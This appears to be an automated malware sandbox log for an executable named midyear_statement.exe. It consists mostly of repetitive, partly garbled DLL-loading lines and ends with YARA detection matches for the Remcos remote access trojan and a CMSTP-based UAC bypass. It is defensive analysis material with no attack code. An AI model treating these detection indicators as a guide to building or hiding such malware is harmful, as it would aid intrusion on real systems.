Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ???y.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ???y.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ???y.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ????.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ????.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ????.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ???2.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ???2.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ???2.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ???.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ???.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ???.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??????s.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??????s.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??????s.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: winhttpcom.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll Jump to behavior
Source: midyear_statement.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
